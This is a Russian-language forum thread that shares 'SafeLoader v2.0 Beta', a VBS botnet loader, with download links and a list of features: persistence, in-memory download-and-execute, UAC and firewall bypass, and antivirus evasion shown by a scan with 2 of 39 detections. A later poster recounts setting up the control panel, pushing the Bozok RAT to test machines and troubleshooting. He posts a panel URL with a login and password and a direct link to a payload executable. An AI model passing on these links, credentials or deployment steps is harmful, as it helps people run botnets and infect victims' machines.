• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

SafeLoader v2.0 Beta


ewwa

Уважаемый пользователь
Форумчанин
Регистрация
19.02.2014
Сообщения
104
Репутация
144
KOkUvIB.png

[HIDE=20]http://www.sendspace.com/file/e4kahw[/HIDE]
Features:
-Coded in VBS (Work in All Windows)
-Anti-Track Panel
-Easy to Install
-All Traffic is Encrypted
-StartUP with Startup Folders
-StartUP with Regedit
-Startup with Windows Tasks
-GeoLocation with GeoIP
-VBS Downloader and Load in Memory
-Stable Update
-Full Uninstall
-Small Size (8Kb)
-Easy Cryptable
-Fuck UAC, SandBox and Firewall
Fecha del reporte: Wed, 02 Apr 2014 16:35:47 +0000
Archivo: safe.vbs
Tamaño: 8934 bytes
MD5: 37c097c70340a1861401007f30a8365b
Estado: Infectado
Detecciones: 2 de 39 (5%)
Reporte:
[Detecciones]
AVG - vir.VBS/Worm
Ad-Aware - Clean
Ahn Lab V3 Internet Security - Clean
Arca Vir - Clean
Avast - Clean
Avira - Clean
Bit Defender - Clean
Bull Guard Internet Security - Clean
ClamAV - Clean
Comodo - Clean
Dr. Web - Clean
EScan Internet Security Suite 14 - Clean
Emisoft Anti-Malware (A-Squared) - Clean
F-Secure - Clean
Fortinet 5 - Clean
Fprot - Clean
Gdata - Clean
Ikarus - Clean
Immunet Antivirus - Clean
K7 Ultimate - Clean
Kaspersky Internet Security 2014 - Trojan.Script.Suspic.gen
Mcafee - Clean
Microsoft Security Essentials - Clean
NOD32 - Clean
Nano - Clean
Norman - Clean
Norton Internet Security - Clean
Outpost Security Suite Pro - Clean
Panda Antivirus - Clean
Panda Cloud - Clean
Quick Heal - Clean
SUPER Anti-Spyware - Clean
Sophos - Clean
Total Defense IS - Clean
Trend Micro - Clean
Twister Antivirus 8 - Clean
VBA - Clean
Vipre Internet Security - Clean
Virit - Clean
 

ewwa

Уважаемый пользователь
Форумчанин
Регистрация
19.02.2014
Сообщения
104
Репутация
144

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
Решил я заюзать этот ботнет.Закинул файлы на хост,экспортировал sql в базу,внёс изменения в конфиг.В общем стандартная процедура.При переходе на страничку админки выдало внутреннюю ошибку сервера.Причиной этому был файл .htaccess который находился в комплекте с ботнетом и в котором было прописано ограничение по доступу с определённых айпи (большое количество).После его удаления-всё стало работать.
Сначала запустил сервер-бота на виртуальной семёре.Всё нормально,на панели появилось оповещение.Затем попробовал на XP и восьмёрине и не фига.На панельке показывает,что активна та первая семёра.Кстати НОД никак не реагирует на запуск этого сервера.Потом выставил в настройках панельки загрузку вредоноса и последующий его запуск (Bozok) на компе жертвы.На той виртуалке где стоял НОД,через некоторое время после запуска сервера сработала защита,оповещая о том,что грузится зловред.Проделал те же манипуляции на машине без антивиря-результат нулевой.Ни загрузки ни запуска так и не произошло,хотя на панельке высветилось,что задача выполнена.
Итог:сейчас у меня пять ,непонятно откуда пришедших бота (в офлайне).Загрузчик показывает,что все загрузки Бозка выполнены,но обратной связи не было.Судя по отсутствию антивирей у ботов,это тоже экспериментальные машины.
После запуска этого VBS скрипта на другой машине,с другим айпишником всё равно в онлайне моя семёра,что за хрень?
Вопросы:почему не пашет .htaccess?Почему не запускается зловред который должен грузиться определённого адреса (может причина в Ргхосте)?Что ещё за команды присутствуют в панели управления?
Логин-пароль и ссылка на админку:
[HIDE=5]http://devillevel.hol.es/level1/index.php
Логин:KarboFoss
Пасс:ARZXs9V36M90gq7
[/HIDE]
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Вопросы:почему не пашет .htaccess?Почему не запускается зловред который должен грузиться определённого адреса (может причина в Ргхосте)?Что ещё за команды присутствуют в панели управления?
А ты сам скрипт правил ?

Код:
sHost = "http://www.website.com/path/gate.php"
sPassword = "DefaultBotPassword"
sDelay = 600000

Кстати если посмотрите скрипт, его можно открыть в блокноте, то как я понимаю вирус загружается через системную программу wscript.exe !

Эта программа для запуска скриптов што-ли в винде, короче лично я вообще заблокировал ей выход в сеть фаерволом, мутная программа, но есть в любой винде...NO-no!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
А ты сам скрипт правил ?
Естественно.Прописал путь до гейта на моём хосте.Пассворд оставил по умолчанию (как и в конфиге.)

Там-же блокировка айпишников и больше ничего нет !
Вот-вот.Но выскакивает ошибка 500.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
А от куда ещё боты взялись ?Отдыхай!!!

Что-то я так и не понял как его юзать, а ты ссылку на сервер с rghost загружаешь, может нужна прямая ссылка ?

Может ещё защита в самой винде сработать, UAC или ещё что, поэтому вирус и не запускается, короче фиг знает...
 

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 652
А от куда ещё боты взялись ?
Хрен знает)И они потихоньку добавляются...
может нужна прямая ссылка
Ссылка прямая,прямо с кнопки закачки на Ргхост(можешь и в панельке глянуть).
[HIDE=1]http://rghost.ru/download/54752749/693f75da1621a07a37b4aa348bebdba1c38d97c8/server.exe[/HIDE]
P.S.На том сайте,откуда этот ботнет к нам приплыл пишут,что это бета версия и могут быть различные ошибки.Первая версия SafeLoader (с билдером) была представлена в 2010 году.Даже ссылка ещё не сдохла:
[HIDE=1]http://www.sendspace.com/file/k42nb5[/HIDE]
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 174
Автор темы Похожие темы Форум Ответы Дата
Антоха Трояны и шпионские программы 12
Похожие темы
Betabot 1.7.0.1 Full Panel + Builder
Верх Низ